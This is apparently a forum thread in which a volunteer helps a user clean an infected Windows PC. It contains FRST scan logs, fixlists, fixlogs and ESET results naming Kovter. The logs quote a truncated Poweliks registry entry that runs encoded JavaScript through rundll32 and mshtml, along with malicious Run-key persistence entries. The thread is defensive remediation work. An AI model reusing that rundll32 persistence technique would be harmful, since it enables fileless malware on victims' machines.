RSLogix Emulate 5000 20.01.00 (CPR 9 SR 5) (HKLM-x32\...\{BCD7C18D-1DE9-4978-AFC3-719C97D8324A}) (Version: 20.01.00 - Rockwell Automation, Inc.)
RSNetWorx for ControlNet 11.00.00 (CPR 9 SR 5) (HKLM-x32\...\{2BF0655E-B036-43F6-9230-BB45CB07F004}) (Version: 11.00.00 - Rockwell Automation, Inc.)
RSNetWorx for DeviceNet 11.00.00 (CPR 9 SR 5) (HKLM-x32\...\{692179FB-984B-465A-BC4F-3875D2D53F32}) (Version: 11.00.00 - Rockwell Automation, Inc.)
RSNetWorx for EtherNet/IP 11.00.00 (CPR 9 SR 5) (HKLM-x32\...\{D92FFA80-FC57-11D6-AFD6-0050BA883E61}) (Version: 11.00.00 - Rockwell Automation, Inc.)
RSView ME 6.10.00.9 (CPR 9 SR 4) (HKLM-x32\...\RSView Studio) (Version:  - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Sid Meier's Civilization: Beyond Earth (HKLM-x32\...\Steam App 65980) (Version:  - Firaxis Games)
Snagit 11 (HKLM-x32\...\{7CA5C4DF-8327-4035-AE2B-CA76336A04FD}) (Version: 11.0.0 - TechSmith Corporation)
Software Updater (HKLM-x32\...\{7ACB9D1D-5B26-4CE4-964A-1EB22461E6F6}) (Version: 4.1.0 - SEIKO EPSON CORPORATION)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
SonicWALL SSL-VPN NetExtender (HKLM-x32\...\{EF06A6A8-6B81-4A09-8223-789953972FFF}) (Version: 4.0.138 - SonicWALL Inc.)
Spectrum Controls 1734 Analog Module Profiles (x32 Version: 1.11.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1756 Analog Module Profiles (x32 Version: 1.09.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1756 Specialty Module Profiles (x32 Version: 1.03.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1769 Analog Module Profiles (x32 Version: 1.05.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1769 Analog Module Profiles (x32 Version: 1.06.1.0 - Spectrum Controls, Inc.) Hidden
Spectrum Controls 1769 Analog Module Profiles (x32 Version: 2.06.1.0 - Spectrum Controls, Inc.) Hidden
SQL Server 2008 R2 Common Files (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Database Engine Services (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Database Engine Shared (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
Sql Server Customer Experience Improvement Program (x32 Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server System CLR Types (HKLM-x32\...\{342D4AD7-EC4C-4EC8-AEA6-E70F5905A490}) (Version: 10.0.1600.22 - Microsoft Corporation)
ST Microelectronics 3 Axis Digital Accelerometer Solution (HKLM-x32\...\{9C24F411-9CA7-4A8A-91F3-F08A4A38EB31}) (Version: 4.10.0039 - ST Microelectronics)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
SugarSync Manager (HKLM-x32\...\SugarSync) (Version: 1.9.97.122348 - SugarSync, Inc.)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.28223 - TeamViewer)
TheGreenBow IPSec VPN Client (HKLM-x32\...\TheGreenBow IPSec VPN Client) (Version:  - TheGreenBow)
TightVNC (HKLM\...\{D2372F87-7DA2-47F7-A102-AF2181B8EAA2}) (Version: 2.7.10.0 - GlavSoft LLC.)
VIVOTEK Installation Wizard 2 (HKLM-x32\...\InstallationWizard2) (Version:  - )
VMware vSphere Client 5.5 (HKLM-x32\...\{4CFB0494-2E96-4631-8364-538E2AA91324}) (Version: 5.5.0.3165 - VMware, Inc.)
VMware Workstation (HKLM-x32\...\VMware_Workstation) (Version: 10.0.3 - VMware, Inc)
VMware Workstation (Version: 10.0.3 - VMware, Inc.) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
XCOM: Enemy Unknown (HKLM-x32\...\Steam App 200510) (Version:  - Firaxis Games)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{3faa4380-a399-11cf-a466-00805fe418f6}\InprocServer32 -> C:\Program Files\Autodesk\DWG TrueView 2013\en-US\dwgviewrficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\DWG TrueView 2013\dwgviewr.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 20:34 - 2009-06-10 15:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {17E14255-BEE0-48A5-8FC0-B3F002EDE6FA} - System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C} => C:\Windows\system32\tlttzup.dll [2014-11-05] ()
Task: {58257D22-D752-4164-B95E-42BE3B84A2A7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-04-29] (Google Inc.)
Task: {58FB209C-C48D-4E10-BBA2-B52D45FED87C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {62C43E74-6A19-4CD6-8DAA-595EA501083E} - System32\Tasks\EPSON XP-610 Series Invitation {764B7596-3AFD-44A0-8816-6BF3CD79EC16} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE [2013-02-27] (SEIKO EPSON CORPORATION)
Task: {74BFA1BC-CE85-4558-80B7-6B7C421E0AB5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-04-29] (Google Inc.)
Task: {DFC92F84-D7BA-4915-9A9B-0115969DDE60} - System32\Tasks\EPSON XP-610 Series Update {764B7596-3AFD-44A0-8816-6BF3CD79EC16} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE [2013-02-27] (SEIKO EPSON CORPORATION)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\EPSON XP-610 Series Invitation {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE
Task: C:\Windows\Tasks\EPSON XP-610 Series Update {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLQE.EXE
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-07-16 11:46 - 2013-10-23 13:24 - 00087600 _____ () C:\Windows\System32\cpwmon64.dll
2014-11-05 08:13 - 2014-11-05 08:13 - 00081202 _____ () C:\Windows\Temp\jffi2349937226329698442.tmp
2014-04-15 09:24 - 2009-01-09 16:21 - 00651264 _____ () C:\Program Files (x86)\PST\Binaries\RACurrTray.exe
2010-11-17 09:35 - 2010-11-17 09:35 - 00514544 _____ () C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe
2014-06-12 16:44 - 2014-06-12 16:44 - 14407384 _____ () C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
2014-10-31 13:55 - 2014-10-31 13:55 - 00031232 _____ () C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack\cygmapMod54.dll
2009-06-11 07:15 - 2009-06-11 07:15 - 00041760 _____ () C:\Program Files (x86)\Common Files\Rockwell\FTDiagnosticsODBCENU.dll
2013-10-09 23:41 - 2013-10-09 23:41 - 00069632 _____ () C:\Program Files (x86)\SugarSync\librsync.dll
2010-11-24 21:44 - 2010-11-24 21:44 - 00375280 _____ () c:\program files (x86)\common files\roxio shared\dllshared\SQLite352.dll
2011-10-18 14:05 - 2011-10-18 14:05 - 00053248 _____ () C:\Program Files (x86)\Rockwell Automation\UsbCipDriver\UsbCipHelper\rausbciplib.dll
2011-11-11 16:26 - 2011-11-11 16:26 - 00015720 _____ () C:\Program Files (x86)\Common Files\Rockwell\RnaStorageSupportServerPS.dll
2014-06-12 17:22 - 2014-06-12 17:22 - 01261272 _____ () C:\Program Files (x86)\VMware\VMware Workstation\libxml2.dll
2014-04-30 14:03 - 2013-11-13 13:23 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:137
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:187
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:266
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:288
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:92
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-1491709306-3982533891-1808157286-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1491709306-3982533891-1808157286-1010 - Limited - Enabled)
Guest (S-1-5-21-1491709306-3982533891-1808157286-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1491709306-3982533891-1808157286-1004 - Limited - Enabled)
Mark (S-1-5-21-1491709306-3982533891-1808157286-1002 - Administrator - Enabled) => C:\Users\Mark
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/05/2014 08:14:30 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:09:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 07:23:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 04:38:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:21:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/03/2014 02:52:05 PM) (Source: VSS) (EventID: 22) (User: )
Description: Volume Shadow Copy Service error: A critical component required by the Volume Shadow Copy service is not registered.
This might happened if an error occurred during Windows setup or during installation of a Shadow Copy provider.
The error returned from CoCreateInstance on class with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and Name Coordinator is [0x80040154, Class not registered
].
 
Error: (11/03/2014 02:51:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DellSystemDetect.exe, version: 5.7.0.6, time stamp: 0x534e6f8a
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xc06d007e
Fault offset: 0x000000000000940d
Faulting process id: 0x55c
Faulting application start time: 0xDellSystemDetect.exe0
Faulting application path: DellSystemDetect.exe1
Faulting module path: DellSystemDetect.exe2
Report Id: DellSystemDetect.exe3
 
Error: (11/03/2014 02:50:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbamservice.exe, version: 3.0.8.0, time stamp: 0x53f64d6c
Faulting module name: mbamservice.exe, version: 3.0.8.0, time stamp: 0x53f64d6c
Exception code: 0x40000015
Fault offset: 0x0008f746
Faulting process id: 0xae8
Faulting application start time: 0xmbamservice.exe0
Faulting application path: mbamservice.exe1
Faulting module path: mbamservice.exe2
Report Id: mbamservice.exe3
 
Error: (11/03/2014 02:50:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NEGui.exe, version: 4.0.138.1, time stamp: 0x4c212f68
Faulting module name: NEGui.exe, version: 4.0.138.1, time stamp: 0x4c212f68
Exception code: 0xc0000005
Fault offset: 0x0000e94d
Faulting process id: 0xd04
Faulting application start time: 0xNEGui.exe0
Faulting application path: NEGui.exe1
Faulting module path: NEGui.exe2
Report Id: NEGui.exe3
 
Error: (11/03/2014 02:50:06 PM) (Source: Desktop Window Manager) (EventID: 9020) (User: )
Description: The Desktop Window Manager has encountered a fatal error (0x80070008)
 
 
System errors:
=============
Error: (11/05/2014 02:17:07 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{38797CE2-CD2A-4B8C-8482-EC19CD6FA29D} because another computer on the network has the same name.  The server could not start.
 
Error: (11/05/2014 10:18:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/05/2014 10:18:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/05/2014 09:19:44 AM) (Source: NetBT) (EventID: 4319) (User: )
Description: A duplicate name has been detected on the TCP network.  The IP address of
the computer that sent the message is in the data. Use nbtstat -n in a
command window to see which name is in the Conflict state.
 
Error: (11/05/2014 08:14:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/04/2014 10:34:59 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140995069
 
Error: (11/04/2014 10:34:59 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140995069
 
Error: (11/04/2014 10:34:59 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: 0x80630203
 
Error: (11/04/2014 10:34:34 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
 
Error: (11/04/2014 08:11:53 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140995069
 
 
Microsoft Office Sessions:
=========================
Error: (11/05/2014 08:14:30 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:09:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 07:23:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 04:38:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/04/2014 08:21:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/03/2014 02:52:05 PM) (Source: VSS) (EventID: 22) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80040154, Class not registered
 
Error: (11/03/2014 02:51:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: DellSystemDetect.exe5.7.0.6534e6f8aKERNELBASE.dll6.1.7601.184095315a05ac06d007e000000000000940d55c01cff7a79dce8fdbC:\Users\Mark\AppData\Local\Apps\2.0\50CAB00K.WMW\2TWBM7VC.CKO\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exeC:\Windows\system32\KERNELBASE.dll39ea321c-639b-11e4-88ff-005056c00008
 
Error: (11/03/2014 02:50:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: mbamservice.exe3.0.8.053f64d6cmbamservice.exe3.0.8.053f64d6c400000150008f746ae801cff7a74f8b205dC:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exeC:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe08aa81ef-639b-11e4-88ff-005056c00008
 
Error: (11/03/2014 02:50:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: NEGui.exe4.0.138.14c212f68NEGui.exe4.0.138.14c212f68c00000050000e94dd0401cff7a7988808e7C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exeC:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exe0822d37f-639b-11e4-88ff-005056c00008
 
Error: (11/03/2014 02:50:06 PM) (Source: Desktop Window Manager) (EventID: 9020) (User: )
Description: 0x80070008
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core i7-4800MQ CPU @ 2.70GHz
Percentage of memory in use: 37%
Total physical RAM: 16289.41 MB
Available physical RAM: 10218.46 MB
Total Pagefile: 32576.99 MB
Available Pagefile: 26656.87 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
 
==================== Drives ================================
 
Drive c: (OSDisk) (Fixed) (Total:452.09 GB) (Free:196.66 GB) NTFS
Drive y: () (Network) (Total:913.35 GB) (Free:342.69 GB) 
Drive z: () (Network) (Total:913.35 GB) (Free:342.69 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 09FF218E)
Partition 1: (Not Active) - (Size=452.1 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=13.7 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Step 1

Please uninstall this program: FromDocToPDF Internet Explorer Toolbar

Step 2

Download attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

fixlist.txt

Link to post
Share on other sites
MarkL123

MarkL123

Posted
  • Author
Posted
I was unable to uninstall the FromDocToPDF Internet Explorer Toolbar.  I attached a jpg of the error I received.

 

 

Fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 09-11-2014 01

Ran by Mark at 2014-11-10 08:43:10 Run:1

Running from C:\Users\Mark\Desktop

Loaded Profile: Mark (Available profiles: Mark)

Boot Mode: Normal

==============================================

 

Content of fixlist:

*****************

Start

CustomCLSID: HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d10] => C:\383d109\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d109] => C:\Users\Mark\AppData\Roaming\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YnPack] => C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YnPack\usejdwp.exe <===== ATTENTION

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YWPack] => regsvr32.exe C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack\cygmapMod54.dll <===== ATTENTION

C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

URLSearchHook: HKCU - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll No File

C:\Program Files (x86)\FromDocToPDF_65

Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File

2014-11-05 08:39 - 2014-11-05 08:39 - 00000028 _____ () C:\Windows\SysWOW64\u

2014-10-28 09:17 - 2014-08-15 13:34 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\BitTorrent

2014-11-05 08:38 - 2014-11-05 08:38 - 00071168 _____ () C:\Windows\system32\tlttzup.dll

2014-11-05 08:38 - 2014-11-05 08:38 - 00003860 _____ () C:\Windows\System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C}

2014-11-05 08:38 - 2014-11-05 08:38 - 00000000 _____ () C:\Windows\system32\yvgmc.dll

C:\Users\Mark\AppData\Local\Temp\stuprt.exe

End

*****************

 

"HKU\S-1-5-21-1491709306-3982533891-1808157286-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key Deleted Successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\383d10 => value deleted successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\383d109 => value deleted successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\YnPack => value deleted successfully.

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Microsoft\Windows\CurrentVersion\Run\\YWPack => Value not found.

"C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack" => File/Directory not found.

"HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.

"HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks\\{4c60e5ab-5c68-4c59-abaa-885010b24b32} => value deleted successfully.

"HKCR\Wow6432Node\CLSID\{4c60e5ab-5c68-4c59-abaa-885010b24b32}" => Key deleted successfully.

"C:\Program Files (x86)\FromDocToPDF_65" => File/Directory not found.

HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{c66a678d-5e6c-4af9-8f57-c6192f42cf74} => value deleted successfully.

"HKCR\Wow6432Node\CLSID\{c66a678d-5e6c-4af9-8f57-c6192f42cf74}" => Key deleted successfully.

C:\Windows\SysWOW64\u => Moved successfully.

C:\Users\Mark\AppData\Roaming\BitTorrent => Moved successfully.

"C:\Windows\system32\tlttzup.dll" => File/Directory not found.

C:\Windows\System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C} => Moved successfully.

C:\Windows\system32\yvgmc.dll => Moved successfully.

C:\Users\Mark\AppData\Local\Temp\stuprt.exe => Moved successfully.

 

==== End of Fixlog ====

post-176504-0-21949800-1415630874_thumb.

Link to post
Share on other sites
MarkL123

MarkL123

Posted
  • Author
Posted
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 09-11-2014 01

Ran by Mark at 2014-11-11 20:30:50 Run:2

Running from C:\Users\Mark\Desktop

Loaded Profile: Mark (Available profiles: Mark)

Boot Mode: Normal

==============================================

 

Content of fixlist:

*****************

Start

C:\Program Files (x86)\FromDocToPDF_65

End

*****************

 

"C:\Program Files (x86)\FromDocToPDF_65" => File/Directory not found.

 

==== End of Fixlog ====

Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Looks like there is no such folder. Next step.

Please scan your machine with ESET OnlineScan

  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.

    ESET OnlineScan

  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer.

      Save it to your Desktop.

    • Double click on the esetsmartinstaller_enu.png to download the ESET Smart Installer. icon on your Desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under Scan Settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
Link to post
Share on other sites
MarkL123

MarkL123

Posted
  • Author
Posted

C:\FRST\Quarantine\C\Users\Mark\AppData\Local\Temp\stuprt.exe.xBAD      Win32/Kovter.A trojan      cleaned by deleting - quarantined

C:\Users\Mark\Downloads\minecraft mods\Setup.exe      a variant of Win32/AdWare.iBryte.BG application cleaned by deleting - quarantined

Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Glad I could help! :)

Step 1

  • Download OTL to your desktop and run it.
  • Click on CleanUp button.
  • You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.
Step 2

Please uninstall ESET Online Scanner .

Step 3

Malware prevention tips:

https://forums.malwarebytes.org/index.php?/topic/81386-so-how-did-i-get-infected-in-the-first-place/

Safe surfing! :)

Link to post
Share on other sites
  • 3 months later...
  • Root Admin
AdvancedSetup

AdvancedSetup

Posted
  • Root Admin
Posted

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.